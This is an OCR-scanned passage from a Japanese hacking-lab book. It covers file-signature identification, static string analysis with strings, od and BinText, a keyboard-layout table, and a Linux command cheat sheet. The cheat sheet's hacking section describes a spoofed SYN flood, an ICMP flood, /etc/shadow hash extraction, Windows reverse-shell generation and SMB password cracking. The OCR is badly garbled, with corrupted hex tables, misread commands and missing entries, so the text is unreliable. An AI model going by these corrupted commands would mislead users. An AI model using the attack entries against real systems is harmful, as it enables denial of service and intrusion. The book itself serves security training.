2 4 92 02 OO 8 8 82 Me C2 
IUIUO | | 16 進数 表記 の ファ イル の 
NN 生 別 子 相 
中 旨 記 | と 28995 癌 際 ( 9 (5 F9 が 
0 64 59 24 94 dE 0 般 80 
EECC3D 導 圧 9E3238 圧 32CCF6F〔 
I3 旭 邊 SA FF 58 FE 03 0 1 IA 5A fA 8 
00EIFO5D1122 労 多 双 99F914F4E5 太 2 
FO311H454 01 MM 多 B2E E 印 1( 21 95 5 94 
| 8UFA 24 FZ 外 ERCU4 7FB64SE5A&[F 好 WW 
DD 4』FCFF IEB1 別 C7 江 0 OU 色 ト FE 誕 泊 机 .、 
[R38 ロ FEA 委 衣 上 自 9241 氏 還 姓 EAI[F 由 下 選 ミ 克 到 介 9r 諸 7 
「 安 ET1 n1 EAR_RR 54 13 5 ET EHPTH_ 2P 1E PE の ラ う ェ <sRT" 
IOxO0000000 LE 。 





図 11.26 バイ ナリ エディ ター で zip ファ イル を 開い た と ころ 
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例え ば 、 代 表 的 な ファ イル ヘッ ダー の ファ イル 識別 子 は 、 表 11.3 の 通り で す 
(*12) 。 慣 れ な いと 16 進数 表記 を 一 目 で 識別 し に くい か も し れ ま せん が 、ASCII 表 
記 で あれ ば すぐ に 識別 で きま す 。 


ed 1.3 ファ イル の 識別子 と 種別 


oxeo ox4e pk _ aezr 


Ox52 0x61 0x/2 0x21 
語 eeeer je ezw 


0x47 0x49 0x46 0x38 

OxFF OxD8 0xFF 0xE0 

OxXX OxXX Ox4A Ox46 |. リ ….JFIF. |jD6gE フ ァイル 

0x49 0x46 Ox00 

oxe9 oxe0 Ox4EOx47 [NG |pwgzzrrw 、.、〈〔〈〔{ 
OxD4 0C8 OxB2 0xA 





これ まで は バイ ナリ ファ イル の 話 で し た が 、 テ キス ト フ ァイル は どう で し ょ う 
か 。 実 の と ころ 、 テ キス ト フ ァイル は 、 ヘ ッ ダ ー や フッ ター を 持ち ませ ん 。 テキ 
スト ファ イル を バイ ナリ エディ ター で 開く と 、 内 容 の 文字 列 が 1 バイ ト 目 か ら 始 
まっ て いる こと を 確認 で きま す 。 


@ PE ファ イル の 識別 


PE ファ イル と は Windows で 動作 する 実行 ファ イル の 1 つ で す 。 バイ ナリ エディ 
ター で 開い て 、 ヘ ッ ダ ー に exe フ ァイル の 識別 子 が ある か を 確認 し ます 。 さ ら に 、 
Ox80 一 Ox100 (16 進 数 アド レス ) あたり に "PE" が あり 、Ox1FO 付 近 に ".text 、 


*12 : 種別 に よっ て は 、 フ ァイル の フッ ター に も 識別 子 が あり ます 。giff フ ァイル は 「Ox3B」、jpeg 
ファ イル は 「OxFF OxD9」 で 終わ り ま す 。 

*13 : 印字 で き な い 文字 は "と し まし た 。 

*14 : 実行 ファ イル だ と 思わ れ た ファ イル の ヘッ ダー に 、 実行 ファ イル の 特徴 を 発見 で き な か っ た 
場合 、 エ ンコ ー ド され て いる 可能 性 が あり ます 。 ま た 、 フ ァイル が 破 融 し て いる と いう こと も ご 
くま れ に あり ます 。 
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"data 、'.rsrc な どの 文字 列 が あれ ば 、PE フ ァイル と 章 断 で きま す 。 


@ フッ ター の 識別 子 が 一 致し な い 

ヘッ ダー の 識別 子 は 画像 ファ イル で ある の に 、 フ ッ タ ー の 識別 子 が 一 致し な い 
ケー ス が あり ます 。 そ れ に も か か わら ず 、 ビ ュー アー ソフ ト で 開く と 画像 が 表示 
され ます 。 そ うい っ た ファ イル は 、 画 像 ファ イル の 後に 、 何 か 別 の デー タ が 付け 
加え られ て いる と 考え られ ます 。 こ の よう に デー タ が 付け 加え られ て も 、 画 像 の 
表示 に 影響 し な い の で す 。 付加 され た デー タ を 特定 する に は 、 画 像 ファ イル の 
フッ ター 以降 の デー タ を 抽出 し て 、 そ の ヘッ ダー や フッ ター に 注目 すれ ば よい の 
まく 


file コマ ンド で 調査 する 

file コ マン ド は 、 フ ァイル 内 か ら 特 徴 的 な デー タ を 検索 する こと で 、 フ ァイル の 
種別 を 特定 する コマ ンド で す 。Linux に 標準 で 備わっ て いま す (15) 。 

file コ マン ド は 、 次 の 流れ で 種別 を 特定 し よう と し ます 。 


1. ファ イル シス テム テス ト : ファ イル が 空 で ある か 、 デ バイ ス 、 デ ィ レ クト リ シ 
ン ボ リッ ク な どの 特殊 な ファ イル で ある か を 調べ る 。 そ の 際 、 シ ステ ムコ ー ル 
の stat を 用 いる 。 その後 、 圧 縮 フ ァイル 、tar ファ イル か どう か な ど を 調べ る 。 

2. マジ ッ ク ナ ン バ ー テ スト :magic デ ー タ ベー ス に 基づい て 、 フ ァイル を 特定 し 
よ 人 と すき 。 

3. 言語 テス ト : フ ァイル 内 の バイ ト 列 の 範囲 を 調べ て 、 各種 エン コー ド (ASCII、 
Unicode な ど ) を 調べ る 。 そ の 結果 、 該 当 す れ ば テキ スト ファ イル と し て 判定 
する 。 

4. 上 記 に 該当 し な けれ ば 、 バ イナ リ 列 と し て 判断 する 。 


magic デ ー タ ベー ス に は 、 フ ァイル の 種別 に 関す る シグ ネ チ ャ 情報 が 記録 され 
て いま す 。 詳細 は 、man magic コマ ンド で 確認 し ます 。 


*15 : Cygwin を イン スト ー ル すれ ば 、Windows で も file コマ ンド を 使用 で きま す 。TrID (http// 
mark0ne/soft-tridehtml) と いう GUI の フ ブ フリー ウェ ア も 存在 し ます 。Windows 10 で あれ ば 、 
WSL で Linux 環境 を 導入 する と よい で し ょ う 。 
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井 man mag1c 


file コマ ンド で 正体 が わか ら な か っ た 場合 、 通 常 data と し て 表示 され ます 。 

また 、file コ マン ド に よる 誤 検 知 も ある の で 、 過 信 し て は いけ ませ ん 。 例え ば 、 
認識 で き な い 形式 で 圧縮 され て お り 、 た また ま ヘ ッ ダ ー 付 近 に ASCII 文字 列 が 含 
まれ て いる と 、"ASCII text と 判断 し て し まう こと が あり ます 。 よ っ て 、 file コマ 
ンド の 結果 を 鵜呑み に せ ず 、 バ イナ リエ ディ ター で 観察 する こと る も 重要 で す 。 そ 
れ で も 判断 が つか な い フ ァイル で あれ ば 、 ヘ ッ ダ ー の 特徴 的 な バイ ト 列 を 検索 し 
て みる と 、 有 和 益 な 情報 が 見 つか る か も し れ ま せん 。 
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11-7 | バイ ナリ ファ イル の 文字 列 を 調べ る 





調査 対象 の バイ ナリ ファ イル が ある 場合 、 最 初 は ファ イル を 実行 せ すず に 解析 し 
ます 。 こ れ を 静 的 解析 と いい ます 。 静 的 解析 に は 様々 な 方 法 が あり ます が 、 最 も 
簡単 な の は ファ イル 内 の 文字 列 を 調べ る こと で す 。 文字 列 か ら フ ァイル の 動作 を 
推測 で きる か も し れ な いか ら で す 。 


沙 strings コマ ンド で 調査 する 

strings コ マン ド は 、 人 任意 の ファ イル か ら 可 読 な 文字 列 を 抽出 する コマ ンド で 
す 。Linux に 標準 で 備わっ て いま す ("16)。 

これ は 実行 ファ イル や 画像 ファ イル に 含ま れる 文字 列 を 調査 する と き に 有効 で 
す 。 例え ば 、 実 行 フ ァイル で あれ ば 、 コ ン パ イル 時 に ソー ス が 機械 語 に 翻訳 され 
て 記録 され ます 。 そ の と き 、 文 字 列 デ ー タ は その まま の 形 で 埋め 込ま れ ま す 。 
strings コ マン ド は この 文字 列 デ ー タ を 抽出 で きま す 。 


代 strings コマ ンド に お ける 文字 列 の 定義 

上 記 の 説明 で は 文字 列 を 抽出 する と いい まし た が 、 厳 客 に は すべ て の 文字 列 を 
抽出 する わけ で は あり ませ ん 。 strings コマ ンド で は 、「ASCII の うち で 表示 可能 な 
文字 (7 ビッ ト 表 現 ) で 構成 され る 4 バイ ト の 表示 可能 な 文字 列 」 を 文字 列 と し て 
定義 し て いる た めで す 。 つ まり 、|「3 バ イト 以下 の 文字 列 』 や 「UTF-8 で 埋め 込ま 
れ た 日 本 語 の 文字 列 ] (8 ビッ ト 表 現 の た め ) に つい て は 、 デ フォ ルト の まま で は 
表示 され ませ ん 。 

UTF-38 の 文字 列 を 表示 させ る に は 、-eS オ プシ ョ ン を 付け ます 。-e オ プシ ョ ン は 
エン コー ディ ング 、S オ プシ ョ ン は 8 ビッ ト を 意味 し ます 。 

また 、 抽 出す る 文字 列 の 文字 数 を 指定 する に は 、-nm オ プシ ョ ン を 使い ます 。 通 
常 、eS オ プシ ョ ン を 使う と 、 ゴ ミ に 相当 する バイ ト 列 も 表示 され て し まう の で 
mn オプ ショ ン で 対処 し ます 。 


*16 : l コ マン ド や strings コマ ンド と 同等 の 機能 は Windows に 備わっ て いま せん 。Cygwin を イ 
ンス トー ル す れ ば 、 Windows 上 で どちら の コマ ンド も 使え る よう に な り ま す 。 ま た 、 同 等 の 機能 
を 提供 する フリ ー ウ ェ ア は 存在 し ます 。 例 えば 、Sysinternals に も strings ツ ー ル が 用 意 き ほれ て い 
ーー ms 


本 所 


し 
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人 で strings コマ ンド が 検索 する デー タ の 位置 

strings コ マン ド は 、 オ プ ジ ェ クト ファ イル の 場合 、 デ ー タ セク ショ ン の み の 文 
字 列 を 対象 と し ます 。 強制 的 に ファ イル 全体 を 対象 と し た い 場 合 は 、-a オ プシ ョ ン 
を 使い ます 。 

-tx オ プシ ョ ン を 付け る と 、16 進 表示 の アド レス も 表示 で きま す 。 


人 で strings コマ ンド を 用 いた テク ニッ ク 

strings コマ ンド の 出力 の すべ て が 有益 な 情報 と は 限り ませ ん 。 む し ろ 無 意味 な 
文字 列 の 方 が 多い と いえ ます 。 

例え ば 、Windows の 実行 ファ イル で あれ ば 、 先 頭 に 登場 する 文字 列 に は 、 セ モク 
ショ ン 名 や PE ヘッ ダー に 関連 する 文字 列 が 含ま れ て いま す 。 特に ".text や 
"data'" と いう 一 般 的 な セク ショ ン 名 で は 、 参 考 に な り ま せん 。 

送 に 参考 に な る 代表 的 な 文字 列 は 、 次 の 通り で す 。 


標準 API の 関数 名 (17) 

ーー ナダ 下 ー ダ 

* IP アド レス 、 ド メイ ン 名 (ハー ドコ ー ド され て いる こと が ある ) 
es コマ ンド 

s ファ イル パス 

* フ ァイル 名 

*・ 特徴 的 な 文字 列 (エン コー ド さ れ た 文字 列 ) 


エン コー ド さ れ た 文字 列 が あれ ば ぱ ば 、 デ コー ド し て みる と よい で し ょ う 。 早 意 の 
ある プロ グラ ム の 場合 、 ア ンチ ウイ ルス の 検知 を 回 避 す る た め に エン コー ド し た 
文字 列 を 用 いる こと が あり ます 。 こ うし た 情報 か ら フ ァイル の 動作 を 断定 する こ 
と は で きま せん が 、 大 雑 把 に 推測 する に は 有効 と いえ ます 。 

可 読 で き な く な っ て いた り 難 読 化 され て いた りす る 場合 や 、 意 図 的 に ミス リー 
ド す る よう な 文字 列 を 含め られ て いる 場合 は 、strings の 出力 か ら す ぐに 有益 な 情 
報 が 得 ら れ な いか も し れ ま せん 。 特に マル ウェ ア は パッ カー に よっ て 圧縮 され て 


*17 : 文字 列 が 関数 名 か どう か を わか ら な い 場 合 は 、MSDN を 参照 し ます 。 
https//msdn.microsoft.com/]a-jp/ 





| 第 11 章 | ハッ キン グ ・ ラ ボ に 役立つ テク ニッ ク 785 


いる こと が あり 、 こ れ に 当て は まる と いえ ます ("18)。 本 格 的 に 解析 する 場合 に 
は 、 デ バッ ガー で 動 的 解析 し ます 。 


湖 od コマ ンド に よる 調査 
od コマ ンド は 、 バ イナ リフ ァイル を ダン プ す る コマ ンド で す 。 次 の よう な 書式 
で 実行 する と 、 文 字 列 を ダン プ で きま す 。 


$ od -An -s < ファ イル 名 > 


-An : オフ セッ ト を 非 表 示 に する 。 
-s : 文字 列 ダ ンプ を 有効 に する 。 


し か し 、 この 文字 列 ダ ンプ 機能 の 場合 、 「\0] で 終了 し て いる ASCII 文字 列 だ け 
が 対象 と な り ま す 。 一 方 、 strings コマ ンド で は 、 ASCII 文字 列 で あれ ば 、 「 ま 0」 で 
終了 し な く て も 出力 し ます 。 


沙 BinText に よる 調査 

BinText は 、 フ ァイル を ドラ ッ グ を ドロ ッ プ する だ け で 、 文字 列 を 抽出 する GUI 
ツー ル で す 。 フ リー ウェ ア と し て 提供 され て いま す 。 キー ワー ド で 検索 し た り 、 文 
字 列 抽出 の 条件 を 設定 し た り も で きま す 。 


McAfee Free Tools 


http://foundstone.com.au/de/downloads/free-tools/bintext.aspx 





*18 : パッ カー で 圧縮 され て いる こと を 調査 する 方 法 は 色々 あり ます が 、PEiD の パッ カー 検知 機 
能 を 使う の が 最も 簡単 で す 。 
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キー ボー ドレ イア ウト の 対応 表 


症 
立 
凍 
凍 
電 
ーー 
に 
和 U 
凌 
U 
町 
症 
立 
束 
3 
還 
古 





日 本 語 (JIS) キー ボー ド と 英語 (US) キー ボー ド は 、 一 部 の キー の レイ アウ ト が 


還 画 還 - 





図 1 キー ボー ドレ イア ウト の 比較 


英語 キー ボー ドレ イア ウト を 設定 し た まま 、 日 本 語 キー ボー ド で 文字 を 入力 する と 
次 の 対応 表 を 参考 に し て くだ さい ( 表 1)。 


に 
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表 1 キー ボー ド の 対応 表 


" [Shifl + 
[Shifll 十 [8l 
[Shiftl 十 上 


こげ 
= 


[Shifll 十 上 上] 
[Shift] 十 [半角 / 全 角 ] 
[Shifll 二 [7] 
[Shifll + [9] 
( 右 括弧 ) [Shifll 二 [0] 


[ (ブラ ケッ ト 左 ) [@ 


(ブラ ケッ ト 右 ) 


] 


[Shift] 十 [@] 
[Shiftll 十 旧 
[Shift] 十 ] 


[Shiftl 十 [] 
[半角 / 全角] 
[Shift] 十 [@] 
[Shifll 二 [ 紀 





| [ShW+E 
| 本 U  ' 
| (Sh 人 +] 
| __ 特 | 
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2 Linux コ マン ウン レル レル ルル アル スシ ジン ア < 





基本 コマ ンド 


# dhc1ient -n < イン ター フェ ー ス 名 > 
動 的 IP アド レス を 開放 する 。 
## dhc1ient < イン ター フェ ー ス 名 > 
新しい 動 的 1 アド レス を 取得 する 。 
井 nets 上 at -r 
ルー ティ ング テー プル を 表示 する 。 
# 1sof -u < ユー ザー 名 > 
ー ザ ー に よっ て 開か れ た ファ イル パス を 表示 する 。 
昔 df -hT 


ディ スク スペ ー ス や ファ イル シス テム を 表示 する 

-h : 読み や すく する 。 

LVM の 論理 ボリ ュー ム は 、 "dev/mapper/ く ボリ ュー ム グ ル ー プ 名 or 論理 ボリ ュー 
ム 名 > > と いう 形式 で 表示 さ れる 。 

# df -ah 


堂 デ ィ ス クス ペー ス を 表す る 。 サ イズ が 0 プロ ッ ク の ファ イル シス テム 、 タ イプ 
が "ignore や auto の ファ イル シス テム も 表示 する 

# grep 494 /var/1og/apache2/access.1og | grep -v -E "favicon --| 

ico| robots . モ xt" 

Apache の ログ か ら 404 エ ラー を 抽出 する 。 た だ し 、 faviconico 、 robots.txt に 関 
する 行 は 除く 


井 nets モ a -an 


- 導 


22 する 。 
-n : 名 前 解決 LN 名 前 解決 の 処理 が な いた め 、 す ば や く 表 示 で きる 。 


昔 1sof† -nPi : 8989 


8080 番 が LISTEN し て いる か を 確認 する 。 
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-n ・ 名 前 解決 し な い 。 
-P : ポー ト 番 号 を ポー ト 名 に 変換 し な い 。 





カー ネル ログ か ら sda ドラ イプ に 関連 する ログ を 出力 する 。 





プロ セス が 開い て いる ファ イル 一 覧 を 表示 する 。 





ファ イル を 使っ て いる プロ セス を 表示 する 。 





全 デ ィ ス ク の パー ティ ショ ン 構 成 を 表示 する (CUI)。 


パー ティ ショ ン ツ ー ル を 起動 する 。 


GUI の パー ティ ショ ン ツ ー ル GParted を 起動 する 。 





ユ 1T6G -SL 


シス テム の パー ティ ショ ン 情 報 を 確認 する 。 





物理 デバ イス 別 の シス テム メモ リー の マッ プ を 表示 する 。 





CPU の 仕様 を 表示 する 。 





PCI デバ イス の 情報 を 表示 する 。 一般 ユ エー ザー で も 実行 で きる が 、 一 部 の PCI デ パ 
イス は 管 理 者 権限 が 必要 で ある た め 、 全 部 表示 され な いこ と が ある 。 





PCI デバ イス の 詳細 情報 を 表示 する 。 





ーー] 
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USB デバ イス の 情報 を 表示 する 。 





USB ヌ メモ リー の デバ イス 名 を 調べ る 。 





リソー スモ ニタ ー。 apt install htop コ マン ド で イン スト ー ル し て お く 必 要 が ある 。 
グラ フィ カル で top よ り 見 や すい 。 










"fle1.txt や 一 "fie9.txt' の 連 番 ファ イル を 作成 する 。 


アー カ イ プ 化 する 。 






アー カ イ プ を 展開 する 。 


tarlgz ファ イル に 圧縮 する 。 





圧縮 され た ファ イル (Z フ ァイル や gz ファ イル ) の まま 、 内 容 を 検索 する 。syslog 
の ログ ファ イル に 対し て 検索 する 際 に 用 いる 。 





圧縮 きれ た ファ イル (zip フ ァイル ) の まま 、 内 容 を 検索 する 。 
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100 行 ご と に 分 割 し た ファ イル を 生成 する 。 デ フォ ルト の プレ フィ ックス が "x" な 
る 生成 され る ブフ ァイル 名 は xaa、 Xab、 え dC 、 … と な る 。 





OS 情報 を すべ て 表示 する 。 





OS 名 と リリ ー ス 番号 を 表示 する 。 

-a: オ プシ ョ ン で は ホス ト 名 まで 表示 され て し まう 。 モ セキュリ ティ 上 ホス ト 名 を 公 
開 す る こと が 好ま し く な い 場 合 は 、 こ の コマ ンド を 用 いる 。 

-s : OS の 名 称 を 表示 する 。 

-F : OS の リリ ー ス 番号 を 表示 する 。 





ディ スト リ ビ ュ ーション 情報 を 表示 する 。 





CPU 情報 を 表示 する 。 





CPU 情報 を 表示 する 。"/proc/cpuinfo" 内 の 主要 な 情報 の み を 表示 する 。 





現在 の メモ リー の 使用 状況 を 表示 する 。 





現在 の メモ リー の 使用 状況 を 表示 する 。Total は 物理 メモ リー、 used は 使用 量 、 free 
は 空き 容量 。 


有効 な し AN アダ プター の 情報 を 表示 する 。 本書 で も よく 使っ て いる が 、 現 在 の 
Linux で は 非 推 装 と な っ て いる 。 代 わりに jp addr コ マン ド が ある 。 





すべ て の LAN ア ダ プ ター の 情報 を 表示 する 。 無効 な し AN アダ プター も 含む 。 





し いう 
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カー ネル モジ ュー ル の 一 覧 を 表示 する 。Size は メモ リー 上 で の サイ ズ 、Used by は 
その モジ ュー ル を 現在 使用 し て いる プロ グラ ム 数 を 表示 する 。 
















指定 し た モジ ュー ル の 情報 を 表示 する 。 











現在 読み 込ま れ て いる カー ネル モジ ュー ル を 表示 する 。 
Apache を 起動 する 。 


Apache の 状態 を 確認 する 。 


ら す と 邊 ! ゝ 1 十 


起動 スク リプ ト で Apache を 再起 動 する 。 





イン スト ー ル され て いる 全 パ ッ ケ ー ジ を 表示 する 。 











指定 し た パッ ケー ジ の 情報 を 表示 する 。 
deb フ ァイル が 依存 する パッ ケー ジ を 確認 する 。 


全 カ ー ネ ル パラ メー タ の 設定 値 を 確認 する 。 カ ー ネ ル パラ メー タ は OS の 挙動 を 設 
定 す る た め の パ ラメ ー タ で ある 。 


1 ー ・ EL 和 ョ ーー 





指定 し た カー ネル パラ メー タ の 値 を 設定 する 。 設 定 後に OS を 再起 動 す る 必要 が な 
い の で 、OS の 挙動 を 動 的 に 変更 で きる 。 
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行 の 出現 吾 度 を 表示 する 。 





リア ル タ イ ム に ログ を 監視 し つつ 、 そ の 標準 入力 を "output.txt' フ ァイル に 出力 する 。 





現在 の ラン レベ ル を 確認 する 。 


それ 以降 の 対話 的 な 操作 を ファ イル に 記録 する 。 記録 を 佑 止 する に は exit コマ ンド 
を 実行 する か 、[Ctrl] + [d] キー を 押す 。 制 御 文 字 も 記録 さき れる (キー ロガー の ロ 
グ を 想像 すれ ば よい )。 そ の た め 、 制 御 文字 を 再 処理 する cat で は 問題 な い が 、vi だ と 
制御 文字 も 表示 され る 。 


全 プ ロモ セス を ユー ザー 名 と 開始 時 刻 と と も に 表示 する 。 











動作 中 の プロ セス を アタ ッ チ し て 、 シ ステ ムコ ー ル を トレ ー ス する 。 





AT&T 形式 で 逆 ア セン プル する 。 





Intel 記 法 で 逆 ア セン プル する 。 
-S : デバ ッ グ 情報 が 含ま れ て いる オプ ジェ クト ファ イル で あれ ば 、 ソ ー ス と アモ セン 
プリ コー ド を 混在 し て 表示 する 。 





デバ ッ ガ ー で ある gdb (ある い は gdb-peda) を 起動 する 。 





指定 し た 関数 を 含ん だ ライ プラ リ を 探す 。 
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プロ セス の 環境 変数 を 表示 する 。environ 仮 想 フ ァイル に は 、 プ ロ セ ス の 環境 変数 
が 保存 きれ て いる 。 ヌ ル バ イ ト (0O) で 区 切ら れ て いる た め 、cat コ マン ド な ど で は 
うま く 表 示さ れ な い (表示 が 崩れ る )。 そ の た め 、strings コマ ンド で 可 読 文字 だ け を 
表示 する 。 


) 
ョ | 






ダン プ フ ァ イ ル の 出力 設定 を 確認 する 。 値 が 0 で あれ ば 出力 し な い 。 


ダン プ フ ァ イ ル の 出力 サイ ズ を 設定 する 。 








プロ セス を 正常 に 終了 させ る 。 と る べき 手段 を と っ て か ら プ ロモ セス が 終了 する 。 こ 
れ で 終了 で き な い プロ セス は 、 強 制 終了 させ る 。 













プロ セス を 強制 終了 する 。 


ュ 1a ョ 1 


killal コ マン ド で も プロ セス を 終了 で きる が 、killall コマ ンド は 停止 させ る 対象 を コ 
マン ド 名 で 指定 する 。Apache に HUP シ グ ナ ル を 送信 する 。 HUP シ グ ナ ル は 、 プロ セ 
ス に 構成 ファ イル を 再読 み 込 みさ せる と き に た び た び 使用 され る 。 





プロ セス に ダン プ フ ァ イ ル を 出力 させ て か ら 終 了 す る 。 





ダン プ フ ァ イ ル を 使っ て バッ クト レー ス を 取得 する 。 bt コマ ンド で ダン プ を 取得 し 
た と き の バ ッ ク ト レー ス が 得 ら れる 。 





ARP テ ー ブ ル か ら 、 指 定 の ARP キ ャ ッシュ を 削除 する 。 





ルー ティ ング テー プ ブル を 表示 する 。 
-n : 名 前 解決 を 抑止 。 





通信 経路 を 確認 する 。 
-n オ プシ ョ ン : 名 前 解決 を 抑止 。 













ド 種 別 で 指定 ) を 調べ る 。 


ホス ト 名 の IP アド レス を 調べ る 。 


ホス ト 名 に 対応 する 情報 (レコ ー 


ホス ト 名 に 対す る 、DNS レコ ー ド の 全 内 容 を 表示 する 。 






すべ て の フィ ル タ リ ング ルー ル を 表示 する 。 


宛先 ボート 番 号 が 80 の パケ ッ ト を 破棄 する 。 則 ter テ ー プ ブル な の で 、 フ ィ ル タリ ン 
グ (パケ ッ ト の 入出 力 を 制御 ) する 。 INPUT チ ェ イ ン な の で 、 パ ケッ ト を 入力 する タ 
イミ ング で 制御 する 。 





INPUT チ ェ イ ン の 最初 に ある ルー ル を 削除 する 。 
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通信 を リダイレクト する 。 nat テ ー ブ ル な の で 、 NAT (パケ ッ ト 中 の IP アド レス を 
書き 換え る 技術 ) を 制御 する 。 PREROUTING チ ェ イ ン は パケ ッ ト 経 路 決定 前 の タイ 
ミン グ 、POSTROUTING チ ェ イ ン は パケ ッ ト 経 路 決定 後 の タ イミ ング で 制御 する 。 

-): ジャ ンプ する ター ゲッ ト を 指定 。 DNAT は 宛先 アド レス を 変換 し 、SNAT は 送 

信 元 アド レス を 変換 する 。 








送信 方 向 の 常 域 制限 を 制御 する 。 


Windows の 共有 フォ ル ダ ー を マウ ント し て 、"/mnU/share" に ある ファ イル と し て 
扱う 。 


1 ーー = si 時 まま ーー 









共有 フォ ル ダ ー の マウ ント 時 に 、 日 本 語 フ ァイル 名 を 表示 で きる よう に する 。 


読み 込み オン リー で マウ ント ポイ ント を 扱う 。 
すでに マウ ント 済み の と き に 、 読 み 込 み オ ン リ ー に する 。 


MTU の 最大 値 で ping を 送信 する 。 1472 は デー タ 部 の バイ ト 数 。 ICMP ヘ ッ ダ の 8 バ 
イト と IP ヘッ ダ の 20 バ イト を 足す と 、 全 体 で 1500 バ イト に な る 。 






仮想 マシ ン か ら イ メー ジ を 作る 。 
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/dev/sda1" の 情報 を 表示 する 。 


空 の ファ イル を 作成 する 。 





ファ イル を 空 に する 。 


改行 コー ド を 変換 する 。 










貼 


2 進数 を 10 進数 に 変換 する 。 





16 進数 を 10 進数 に 変換 する 。 












誠 ハッ キン グ 関 係 


- モ ロロ 3 


広域 Ping ス イ し 






デビ アロ 』] ] 


高速 な 広域 Ping スイ ー プ 。 fping は 並行 実行 が 可能 な Ping ユ ー テ ィ リ ティ 。 





信頼 性 の ある Ping ス イー プ 。 nmap に -sP オ プシ ョ ン や -sn オ プシ ョ ン を 指定 する と 
Ping ス キャ ン す る 。 LAN 内 で の Ping ス キャ ン で は 、 ARP 要 求 を 用 いる 。 一 方 、 WAN 
の Ping ス キャ ン で は 、ICMP エ コー 要求 、ICMP タ イム スタ ンプ 要求 、TCP パ ケッ ト 
を 送信 する 。 多 角 的 な 方 法 で 確認 する た め 、 普 通 の Ping ス イー プ よ り 信 頼 性 が 高い 。 
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ポー ト 80 に "header.txt" の 内 容 を 送信 する 。 

-v : 詳細 な 情報 を 表示 する 。 

-vv : -y よ り も 詳細 な 情報 を 出力 する 。 
Debian 系 の Netcat は -vv オ プシ ョ ン に 対応 し て いる 。Netcat の 種類 に よっ て は -y 

オプ ショ ン の み 。 





Web サ ー バ ー に HEAD リ クエ スト を 送信 する 。 こ れ に 対し て 反応 が な けれ ば 、 
Web サ ー バ ー あ る い は Web サ ービス に 問題 が ある と いえ る 。 "Connection refused”" と 
な れ ば 、「 接 続 が 拒否 され て いる 」「Web サ ービス が 稼働 し て いな い 」 可能 性 が ある 。 
"Connection timed out' と な れ ば 、「 サ ー バ ー が ダウ ン し て いる 」「 ネ ットワーク の 経 
路 に 問題 が ある ]」「 フ ィ ル タリ ング きれ て いる 」 可能 性 が ある 。 





指定 し た サー バー の city、region、county、loc、org、postal など を 表示 する 。 





シン プル な ファ ジン グ 。 ラ ンダ ム な デー タ を 送信 する 。 





16 進 ゲン プ フ ァ イ ル を バイ ナリ デー タ に 変換 する 。 


SSH 通 信 を 抽出 し て 、"ssh.pcap" ファ イル に 格納 する 。 


SYN リ クエ スト の Do06 ア タッ ク 。 
-S:SYN リ クエ スト 。 

XXX.XXX.XXX.XXX: ター ゲッ ト 上 端末 。 

-a YYVV.YVV.YVY.YYy : 偽 の 送信 元 IP ア ドレ ス 。 
22 : SSH ボ ポー ト 。 

--f1ood : 可能 な 限り 早く 送信 。 


LAN 内 の 端末 を イン ター ネッ ト に 接続 させ な くす る 。 
ZZZ.ZZZ.ZZZ.ZZZ: デ フォ ルト ゲー トウ ェ イ 。 





00 













ICMP flood 攻 撃 。 2K バ イト の パケ ッ ト を 連続 し た スト リー ム と し て 送信 する 。 


ユー ザー 列挙 。"/etc/passwd" の 第 1 フィ ー ル ド を 抽出 する 。 


パス ワー ド ハ ッ シュ ファ イル を 作る 。"/etc/shadow" ファ イル か ら 第 1 フィ ー ル ド 
と 第 2 フィ ー ル ド だ け を 抽出 する 。 た だ し 、「*」 や 「 唱 を 含む も の を 除外 する 。 





SUID/SGID ビッ ト を 持つ 全 フ ァイル を リス ト ア ッ プ する 。 





Netcatl に よる ポー トス キャ ン 。 
-w 1: タ イム アウ ト ま で 1 秒 待つ 。 
-Z ・ デー タ を ポー ト に 送信 し な い 。 接続 が 確立 し た ら ク ロー ズ す る 。 










192.168.11 一 254 に 対し て Nul ス キャ ン す る 。 
TCP スキ ャ ン と フィ ン ガ ー プ リン ト (OS 特定 ) する 。 


DNS を 指定 し て UDP ス キャ ン す る 。 


疑似 Web サー バー。 


Windows 向 け の リバ ー ス シェ ル を 生成 する 。 








Windows 向 け の ユー ザー 追加 プロ グラ ム を 生成 する 。 





SMB ユ ー ザ ー の リモ ー ト パス ワー ド 解 析 。 





wlan0 に 2 番目 の サ プ ネ ッ ト を 追加 。 





“ “ - sy -type † -exec sha1s -D 1 
指定 パス 配下 の ファ イル の SHA1 の ハッ シュ 値 を 表示 する 。 
-xdev : ブフ ァイル シス テム の み に 限 定 。 





シス テム の 最初 の ドラ イブ の raw イメ ー ジ を 作る 。 






tcpdump で 特定 の 通信 を キャ プチ ャ する (キャ プチ ャ フィ ル タ の 適用 )。 





Malware Hash Registry に 問い 合わ せ て 、 マ ルウ ェ ア か どう か を 判定 する 。 






ライ プラ リ 関 数 を 列挙 する 。 


共有 ライ プラ リ を 列挙 する 。 





LAN 内 の Windows コ ンピュータ 名 (NetBIOS 名 ) の 一 覧 を 表示 。 IP アド レス 、 
NetBIOS 名 、MAC ア ドレ ス を 表示 する 。Windows 以 外 で も コン ピュ ー タ 名 を 持て ば 
表示 され る 。 





ター ゲッ ト の 詳細 情報 を 表示 する 。 













sdb ドラ イプ を ゼロ 初期 化 。 


パス ワー ド フ ァイル の 内 容 を ユー ザーID で ソー ト す る 。 

-t : 区 切り 文字 デフォルト で は 空白 。 

-n : 対象 を 数 値 と し て 比較 。 こ れ を 指定 し な いと 、10 と 2 で は 2 の 方 が 大 き な 値 に 
が の で し まう 。 

-k : 第 3 フィ ー ル ド 





メタ デー タ を 参照 する 。 画像 ファ イル 、MS の Ofice (Word、Excel) の ファ イル 、 
pdf フ ァイル な ど を 指定 する 。 





反 コ マン ド で ファ イル と 特定 で き な い と き や 、 細 工 さ れ た ファ イル を 解析 する 。 
-e : ファ イル を 抽出 。 
-M : 圧 灯 ファ イル が あれ ば 再帰 的 に 展開 し て 探索 する 。 





ファ イル シス テム を 解析 する 。 フ ァイル の 一 覧 や 詳細 情報 を 表示 する 。 出力 さ れ た 
数 字 は ji ノー ド 。 後 で icat の 実行 時 に 使う 。「*| が 表示 され て いれ ば 、 それは 削除 され 
だ アア オイ ル 。 





イメ ー ジ ファ イル か ら フ ァイル を 抽出 する 。 
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指定 され た Web サー バー に 接続 する HTTP Proxy と し て 機能 する 。 


8080 ポート で HTTP Proxy を 立て る 。HTTPS 通 信 の 中 身 を 確認 で きる 。 プ ラウ ザ 
で 航 告 を 表示 させ ず に 通信 させ る に は 、 mitmproxy が 生成 する 証明 書 を プラ ウザ に 登 
録 す る 。 









